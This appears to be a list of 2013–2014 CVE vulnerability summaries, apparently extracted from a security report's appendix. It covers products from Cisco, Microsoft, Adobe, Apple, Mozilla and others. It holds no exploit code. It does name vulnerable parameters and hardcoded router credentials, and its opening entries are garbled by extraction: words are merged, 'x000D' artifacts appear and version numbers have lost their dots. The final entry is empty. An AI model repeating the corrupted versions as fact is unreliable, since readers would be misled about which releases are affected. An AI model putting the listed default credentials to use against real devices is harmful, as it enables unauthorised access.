CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors

CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674

CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975

CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521

CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139

CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622

CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors

CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx

CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement

CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse

CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors

CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo

CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate

CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow

CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site

CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880

CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902

CVE-2013-6979
The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994
OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043
Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389
Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001
Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 22 of 28

CVE-2014-0035
The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207
The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259
Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266
The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294
Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354
The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362
Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488
APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493
Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494
Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498
Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X, and before 11.2.202.341 on Linux; Adobe AIR before 4.0.0.1628 on Android; Adobe AIR SDK before 4.0.0.1628; and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515
Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533
Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X, and before 11.2.202.378 on Linux; Adobe AIR before 14.0.0.110; Adobe AIR SDK before 14.0.0.110; and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536
Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X, and before 11.2.202.378 on Linux; Adobe AIR before 14.0.0.110; Adobe AIR SDK before 14.0.0.110; and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562
Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577
Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X, and before 11.2.202.418 on Linux; Adobe AIR before 15.0.0.356; Adobe AIR SDK before 15.0.0.356; and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783
Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330
WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342
WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349
Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356
Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370
The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379
Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382
WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466
SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472
Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563
Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565
The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586
content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701
The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740
Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744
Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753
Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806
The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808
Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811
The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812
The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014
imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103
Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109
The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364
Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554
OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742
Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768
Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821
Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444
The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489
lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507
Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556
The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814
The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819
Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872
Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044
OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481
Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631
RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528
The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040
GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105
IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136
IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164
IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363
vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".

CVE-2014-6369
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-6378
Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250
The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927
The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945
OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447
Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638
The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835
